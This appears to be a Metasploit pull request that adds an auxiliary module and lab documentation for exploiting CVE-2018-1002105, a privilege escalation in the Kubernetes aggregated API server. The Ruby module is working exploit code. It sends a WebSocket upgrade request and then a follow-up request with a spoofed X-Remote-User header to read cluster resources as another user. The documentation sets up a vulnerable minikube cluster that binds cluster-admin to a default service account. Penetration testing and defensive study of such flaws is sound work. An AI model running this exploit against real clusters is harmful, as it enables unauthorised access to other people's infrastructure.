### PR TITLE
Kubernetes Aggregate API Server Privilege Escalation Unauthenticated (CVE-2018-1002105)

### DIFF
--- a/documentation/modules/auxiliary/admin/http/kubernetes_aggrapiserver_privesc_unauth.md
+++ b/documentation/modules/auxiliary/admin/http/kubernetes_aggrapiserver_privesc_unauth.md
@@ -146,3 +146,5 @@ kubectl get --raw /apis/ | jq . |grep -i groupVersion
 https://github.com/kubernetes-incubator/service-catalog/blob/master/docs/install.md
 https://www.twistlock.com/labs-blog/demystifying-kubernetes-cve-2018-1002105-dead-simple-exploit/
 https://github.com/kubernetes/kubernetes/issues/71411
+http://blog.disects.com/2018/12/kubernetes-privilege-escalation-cve.html
+http://blog.disects.com/2018/12/exploiting-kubernetes-privilege.html

--- a/documentation/modules/auxiliary/admin/http/kubernetes_aggrapiserver_privesc_unauth.md
+++ b/documentation/modules/auxiliary/admin/http/kubernetes_aggrapiserver_privesc_unauth.md
@@ -1,0 +1,148 @@
+## Kubernetes Aggregate API Server Privilege Escalation Unauthenticated
+
+## minikube
+- Start
+You can start minikube using below command
+```
+minikube start
+```
+Start minikube with specific vulnerable kubernetes version
+```
+minikube start --kubernetes-version 1.10.0
+```
+Check the status of minikube k8s cluster status
+```
+$ minikube status
+host: Running
+kubelet: Running
+apiserver: Running
+kubectl: Correctly Configured: pointing to minikube-vm at 192.168.99.100
+```
+
+Once the cluster is up and running we can get API Server details
+```
+$ kubectl cluster-info
+Kubernetes master is running at https://192.168.99.100:8443
+KubeDNS is running at https://192.168.99.100:8443/api/v1/namespaces/kube-system/services/kube-dns:dns/proxy
+```
+
+### Metrics Aggregation API
+- Enable Metrics Aggregation API
+```
+minikube addons list
+minikube addons enable metrics-server
+```
+
+### Service Catalogue Aggregation API
+registry-creds is kind of dependency to enable service catalog in minikube
+```
+minikube addons enable registry-creds
+```
+
+Create clusterrolebinding to be used by Tiller
+$ kubectl create clusterrolebinding tiller-cluster-admin \
+     --clusterrole=cluster-admin \
+     --serviceaccount=kube-system:default
+clusterrolebinding.rbac.authorization.k8s.io/tiller-cluster-admin created
+
+- Helm
+helm is a package manager for kubernetes. helm init is used to deploy/install/configure Tiller Server/Client to a specific namespace, kube-system is default namespace.
+Below commands will initialize helm, create Tiller server in kube-system namespace and install service catalog chart. 
+```
+$ helm init
+
+# if u have helm errors with minikube
+$ helm init --upgrade --debug
+$ kubectl create -f tiller-minikube.yaml -n kube-system
+$ helm install svc-cat/catalog --name catalog --namespace catalog
+```
+
+Tiller deployment configuration
+```
+$ cat tiller-minikube.yaml
+apiVersion: extensions/v1beta1
+kind: Deployment
+metadata:
+  creationTimestamp: null
+  labels:
+    app: helm
+    name: tiller
+  name: tiller-deploy
+  namespace: kube-system
+spec:
+  strategy: {}
+  template:
+    metadata:
+      creationTimestamp: null
+      labels:
+        app: helm
+        name: tiller
+    spec:
+      containers:
+      - env:
+        - name: TILLER_NAMESPACE
+          value: kube-system
+        - name: TILLER_HISTORY_MAX
+          value: "0"
+        image: gcr.io/kubernetes-helm/tiller:v2.8.2
+        imagePullPolicy: IfNotPresent
+        livenessProbe:
+          httpGet:
+            path: /liveness
+            port: 44135
+          initialDelaySeconds: 1
+          timeoutSeconds: 1
+        name: tiller
+        ports:
+        - containerPort: 44134
+          name: tiller
+        - containerPort: 44135
+          name: http
+        readinessProbe:
+          httpGet:
+            path: /readiness
+            port: 44135
+          initialDelaySeconds: 1
+          timeoutSeconds: 1
+        resources: {}
+status: {}
+---
+apiVersion: v1
+kind: Service
+metadata:
+  creationTimestamp: null
+  labels:
+    app: helm
+    name: tiller
+  name: tiller-deploy
+  namespace: kube-system
+spec:
+  ports:
+  - name: tiller
+    port: 44134
+    targetPort: tiller
+  selector:
+    app: helm
+    name: tiller
+  type: ClusterIP
+status:
+  loadBalancer: {}
+```
+
+### Debug
+- Check installed api extensions
+```
+$ kubectl get apiservices -o 'jsonpath={range .items[?(@.spec.service.name!="")]}{.metadata.name}{"\n"}{end}'
+v1beta1.metrics.k8s.io
+v1beta1.servicecatalog.k8s.io
+```
+
+- Check available API and their versions
+```
+kubectl get --raw /apis/ | jq . |grep -i groupVersion
+```
+
+### References
+https://github.com/kubernetes-incubator/service-catalog/blob/master/docs/install.md
+https://www.twistlock.com/labs-blog/demystifying-kubernetes-cve-2018-1002105-dead-simple-exploit/
+https://github.com/kubernetes/kubernetes/issues/71411

--- a/documentation/modules/auxiliary/admin/http/kubernetes_aggrapiserver_privesc_unauth.md
+++ b/documentation/modules/auxiliary/admin/http/kubernetes_aggrapiserver_privesc_unauth.md
@@ -2,6 +2,7 @@
 
 ## minikube
 - Start
+
 You can start minikube using below command
 ```
 minikube start
@@ -40,12 +41,15 @@ minikube addons enable registry-creds
 ```
 
 Create clusterrolebinding to be used by Tiller
+```
 $ kubectl create clusterrolebinding tiller-cluster-admin \
      --clusterrole=cluster-admin \
      --serviceaccount=kube-system:default
 clusterrolebinding.rbac.authorization.k8s.io/tiller-cluster-admin created
+```
 
 - Helm
+
 helm is a package manager for kubernetes. helm init is used to deploy/install/configure Tiller Server/Client to a specific namespace, kube-system is default namespace.
 Below commands will initialize helm, create Tiller server in kube-system namespace and install service catalog chart. 
 ```

--- a/modules/auxiliary/admin/http/kubernetes_aggrapiserver_privesc_unauth.rb
+++ b/modules/auxiliary/admin/http/kubernetes_aggrapiserver_privesc_unauth.rb
@@ -1,0 +1,158 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+require 'net/http'
+require 'uri'
+require 'json'
+
+class MetasploitModule < Msf::Auxiliary
+  Rank = ExcellentRanking
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Kubernetes Aggregated API Server Privilege Escalation (unauthorised)',
+      'Description'    => %q{
+      	  An API call to any aggregated API server endpoint can be escalated 
+	  to perform any API request against that aggregated API server, as 
+	  long as that aggregated API server is directly accessible from the 
+	  Kubernetes API server’s network. Default RBAC policy allows all 
+	  users (authenticated and unauthenticated) to perform discovery API 
+	  calls that allow this escalation against any aggregated API servers 
+	  configured in the cluster.
+      },
+      'Author'         =>
+        [
+	  'Praveen Darshanam<praveend[dot]hac[at]gmail.com>', # metasploit module
+	  'Ariel Zelivansky', # metrics api poc
+	  'Vincent' # service catalog api poc
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'CVE', '2018-1002105' ],
+          [ 'BID', '106068' ],
+          [ 'URL', 'https://github.com/kubernetes/kubernetes/issues/71411' ],
+          [ 'URL', 'https://blog.disects.com/2018/12/exploiting-kubernetes-privilege.html' ]
+        ],
+      'Targets'		=> 
+        [
+	  ['Kubernetes', {} ]
+	],
+      'Platform'       => ['linux', 'win'],
+      'Arch'           => ARCH_CMD,
+      'Privileged'     => false,
+      'DefaultTarget'  => 0,
+      'DisclosureDate'  => 'Nov 09 2018'))
+
+    register_options(
+      [
+        Opt::RPORT(443),
+	OptString.new('AGGREGATED_API', [ true, 'Aggregates API to use for Privilege Escalation', 'v1beta1.metrics.k8s.io' ]),
+	OptString.new('API_SERVER', [ true, 'Kubernetes cluster API Server HOST/FQDN/IP Address', nil ]),
+	OptString.new('API_RESOURCE_NAME', [ true, 'Kubernetes API Resource name (pods, nodes, servicebindings, seeds, shoots etc)', nil ]),
+	OptString.new('NAMESPACE', [ false, 'Kubernetes namespace to get api-resource details from', nil ]),
+        OptString.new('X-Remote-User', [ true, 'Kubernetes User to escalate', nil ]),
+        OptString.new('X-Remote-Group', [ false, 'Kubernetes Group', nil ])
+      ])
+    deregister_options('RHOST')
+  end
+
+  def check
+    host = datastore['API_SERVER']
+    port = datastore['RPORT']
+    api_ver = datastore['AGGREGATED_API'].split('.')[0]
+    aggr_api = datastore['AGGREGATED_API'].split('.',2)[1]
+    if port != 443
+      req_str = "https://#{host}:#{port}/apis/#{aggr_api}/#{api_ver}"
+    else
+      req_str = "https://#{host}/apis/#{aggr_api}/#{api_ver}"
+    end
+    print_status("Checking the presence of Aggregated API\n#{datastore['AGGREGATED_API']}")
+    Net::HTTP.start(host, port, :use_ssl => 'https', :verify_mode => OpenSSL::SSL::VERIFY_NONE) do |http|
+      check_uri = URI(req_str)
+      ws_req = Net::HTTP::Get.new check_uri
+      ws_req.add_field("User-Agent", "kubectl")
+      ws_req.add_field("Upgrade", "WebSocket")
+      ws_req.add_field("Connection", "upgrade")
+      print_status("Sending WebSocket request to API Server\n#{req_str}")
+
+      ws_resp = http.request ws_req 
+      if ws_resp.code =~ /200/
+        print_good("Found aggregated API Server \"#{datastore['AGGREGATED_API']}\" in the cluster")
+        ws_data = JSON.parse(ws_resp.body)
+        print_status("Response\n#{JSON.pretty_generate(ws_data)}") 
+        http.finish
+        return Exploit::CheckCode::Vulnerable
+      else
+        print_error("Aggregated API Server \"#{datastore['AGGREGATED_API']}\" not found")
+        http.finish
+        return Exploit::CheckCode::Safe
+      end
+    end
+  end
+
+  def privesc_request(host, port, aggr_api, api_ver)
+    rsource = datastore['API_RESOURCE_NAME']
+    if port != 443
+      ws_req_str = "https://#{host}:#{port}/apis/#{aggr_api}/#{api_ver}"
+      if datastore['NAMESPACE']
+        pod_req_str = "https://#{host}:#{port}/apis/#{aggr_api}/#{api_ver}/namespaces/#{datastore['NAMESPACE']}/#{rsource}"
+      else
+        pod_req_str = "https://#{host}:#{port}/apis/#{aggr_api}/#{api_ver}/#{rsource}"
+      end
+    else
+      ws_req_str = "https://#{host}/apis/#{aggr_api}/#{api_ver}"
+      if datastore['NAMESPACE']
+        pod_req_str = "https://#{host}/apis/#{aggr_api}/#{api_ver}/namespaces/#{datastore['NAMESPACE']}/#{rsource}"
+      else
+        pod_req_str = "https://#{host}/apis/#{aggr_api}/#{api_ver}/#{rsource}"
+      end
+    end
+
+    Net::HTTP.start(host, port, :use_ssl => 'https', :verify_mode => OpenSSL::SSL::VERIFY_NONE) do |http|
+      uri = URI(ws_req_str)
+      ws_req = Net::HTTP::Get.new uri
+      ws_req.add_field("User-Agent", "kubectl")
+      ws_req.add_field("Upgrade", "WebSocket")
+      ws_req.add_field("Connection", "upgrade")
+      print_status("Sending WebSocket request to API Server\n#{ws_req_str}")
+
+      ws_resp = http.request ws_req 
+      if ws_resp.code =~ /200/
+        print_good("Found aggregated API Server \"#{datastore['AGGREGATED_API']}\" in the cluster")
+        ws_data = JSON.parse(ws_resp.body)
+        print_status(JSON.pretty_generate(ws_data)) 
+      else
+        print_error("Aggregated API Server \"#{datastore['AGGREGATED_API']}\" not found")
+	http.finish
+        return
+      end
+      uri = URI(pod_req_str)
+      pod_req = Net::HTTP::Get.new uri
+      pod_req.add_field("User-Agent", "kubectl")
+      pod_req.add_field("X-Remote-User", datastore['X-Remote-User'])
+
+      print_status("Sending escalated API request to kubernetes Resource\n#{pod_req_str}")
+      pod_resp = http.request pod_req 
+
+      if pod_resp.code =~ /200/
+        print_good("Successfully escalated to user #{datastore['X-Remote-User']}")
+        pod_data = JSON.parse(pod_resp.body)
+        print_status(JSON.pretty_generate(pod_data)) 
+      else
+        print_error("Couldn't escalate to user #{datastore['X-Remote-User']}")
+      end
+      http.finish
+    end
+  end
+
+  def run 
+    host = datastore['API_SERVER']
+    port = datastore['RPORT']
+    api_ver = datastore['AGGREGATED_API'].split('.')[0]
+    api = datastore['AGGREGATED_API'].split('.',2)[1]
+
+    privesc_request(host, port, api, api_ver)
+  end
+end

--- a/modules/auxiliary/admin/http/kubernetes_aggrapiserver_privesc_unauth.rb
+++ b/modules/auxiliary/admin/http/kubernetes_aggrapiserver_privesc_unauth.rb
@@ -7,25 +7,18 @@ require 'uri'
 require 'json'
 
 class MetasploitModule < Msf::Auxiliary
-  Rank = ExcellentRanking
 
   def initialize(info = {})
     super(update_info(info,
       'Name'           => 'Kubernetes Aggregated API Server Privilege Escalation (unauthorised)',
       'Description'    => %q{
-      	  An API call to any aggregated API server endpoint can be escalated 
-	  to perform any API request against that aggregated API server, as 
-	  long as that aggregated API server is directly accessible from the 
-	  Kubernetes API server’s network. Default RBAC policy allows all 
-	  users (authenticated and unauthenticated) to perform discovery API 
-	  calls that allow this escalation against any aggregated API servers 
-	  configured in the cluster.
+    An API call to any aggregated API server endpoint can be escalated to perform any API request against that aggregated API server, as long as that aggregated API server is directly accessible from the Kubernetes API server’s network. Default RBAC policy allows all users (authenticated and unauthenticated) to perform discovery API calls that allow this escalation against any aggregated API servers configured in the cluster.
       },
       'Author'         =>
         [
-	  'Praveen Darshanam<praveend[dot]hac[at]gmail.com>', # metasploit module
-	  'Ariel Zelivansky', # metrics api poc
-	  'Vincent' # service catalog api poc
+          'Praveen Darshanam<praveend[dot]hac[at]gmail.com>', # metasploit module
+          'Ariel Zelivansky', # metrics api poc
+          'Vincent' # service catalog api poc
         ],
       'License'        => MSF_LICENSE,
       'References'     =>
@@ -35,10 +28,10 @@ class MetasploitModule < Msf::Auxiliary
           [ 'URL', 'https://github.com/kubernetes/kubernetes/issues/71411' ],
           [ 'URL', 'https://blog.disects.com/2018/12/exploiting-kubernetes-privilege.html' ]
         ],
-      'Targets'		=> 
+      'Targets'		=>
         [
-	  ['Kubernetes', {} ]
-	],
+          ['Kubernetes', {} ]
+        ],
       'Platform'       => ['linux', 'win'],
       'Arch'           => ARCH_CMD,
       'Privileged'     => false,
@@ -48,10 +41,10 @@ class MetasploitModule < Msf::Auxiliary
     register_options(
       [
         Opt::RPORT(443),
-	OptString.new('AGGREGATED_API', [ true, 'Aggregates API to use for Privilege Escalation', 'v1beta1.metrics.k8s.io' ]),
-	OptString.new('API_SERVER', [ true, 'Kubernetes cluster API Server HOST/FQDN/IP Address', nil ]),
-	OptString.new('API_RESOURCE_NAME', [ true, 'Kubernetes API Resource name (pods, nodes, servicebindings, seeds, shoots etc)', nil ]),
-	OptString.new('NAMESPACE', [ false, 'Kubernetes namespace to get api-resource details from', nil ]),
+        OptString.new('AGGREGATED_API', [ true, 'Aggregates API to use for Privilege Escalation', 'v1beta1.metrics.k8s.io' ]),
+        OptString.new('API_SERVER', [ true, 'Kubernetes cluster API Server HOST/FQDN/IP Address', nil ]),
+        OptString.new('API_RESOURCE_NAME', [ true, 'Kubernetes API Resource name (pods, nodes, servicebindings, seeds, shoots etc)', nil ]),
+        OptString.new('NAMESPACE', [ false, 'Kubernetes namespace to get api-resource details from', nil ]),
         OptString.new('X-Remote-User', [ true, 'Kubernetes User to escalate', nil ]),
         OptString.new('X-Remote-Group', [ false, 'Kubernetes Group', nil ])
       ])
@@ -77,11 +70,11 @@ class MetasploitModule < Msf::Auxiliary
       ws_req.add_field("Connection", "upgrade")
       print_status("Sending WebSocket request to API Server\n#{req_str}")
 
-      ws_resp = http.request ws_req 
+      ws_resp = http.request ws_req
       if ws_resp.code =~ /200/
         print_good("Found aggregated API Server \"#{datastore['AGGREGATED_API']}\" in the cluster")
         ws_data = JSON.parse(ws_resp.body)
-        print_status("Response\n#{JSON.pretty_generate(ws_data)}") 
+        print_status("Response\n#{JSON.pretty_generate(ws_data)}")
         http.finish
         return Exploit::CheckCode::Vulnerable
       else
@@ -118,14 +111,14 @@ class MetasploitModule < Msf::Auxiliary
       ws_req.add_field("Connection", "upgrade")
       print_status("Sending WebSocket request to API Server\n#{ws_req_str}")
 
-      ws_resp = http.request ws_req 
+      ws_resp = http.request ws_req
       if ws_resp.code =~ /200/
         print_good("Found aggregated API Server \"#{datastore['AGGREGATED_API']}\" in the cluster")
         ws_data = JSON.parse(ws_resp.body)
-        print_status(JSON.pretty_generate(ws_data)) 
+        print_status(JSON.pretty_generate(ws_data))
       else
         print_error("Aggregated API Server \"#{datastore['AGGREGATED_API']}\" not found")
-	http.finish
+        http.finish
         return
       end
       uri = URI(pod_req_str)
@@ -134,12 +127,12 @@ class MetasploitModule < Msf::Auxiliary
       pod_req.add_field("X-Remote-User", datastore['X-Remote-User'])
 
       print_status("Sending escalated API request to kubernetes Resource\n#{pod_req_str}")
-      pod_resp = http.request pod_req 
+      pod_resp = http.request pod_req
 
       if pod_resp.code =~ /200/
         print_good("Successfully escalated to user #{datastore['X-Remote-User']}")
         pod_data = JSON.parse(pod_resp.body)
-        print_status(JSON.pretty_generate(pod_data)) 
+        print_status(JSON.pretty_generate(pod_data))
       else
         print_error("Couldn't escalate to user #{datastore['X-Remote-User']}")
       end
@@ -147,7 +140,7 @@ class MetasploitModule < Msf::Auxiliary
     end
   end
 
-  def run 
+  def run
     host = datastore['API_SERVER']
     port = datastore['RPORT']
     api_ver = datastore['AGGREGATED_API'].split('.')[0]


### PR DESCRIPTION
This commit is exploit for CVE-2018-1002105 (Kubernetes Privilege Escalation)

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use auxiliary/admin/http/kubernetes_aggrapiserver_privesc_unauth`
- [x] set required variables
```
set AGGREGATED_API v1beta1.metrics.k8s.io
set API_SERVER 192.168.99.100
set API_RESOURCE_NAME pods
set RPORT 8443
```
- [x] **Verify**  execute `run` or `exploit`
- [x] **Verify** the thing does not do what it should not


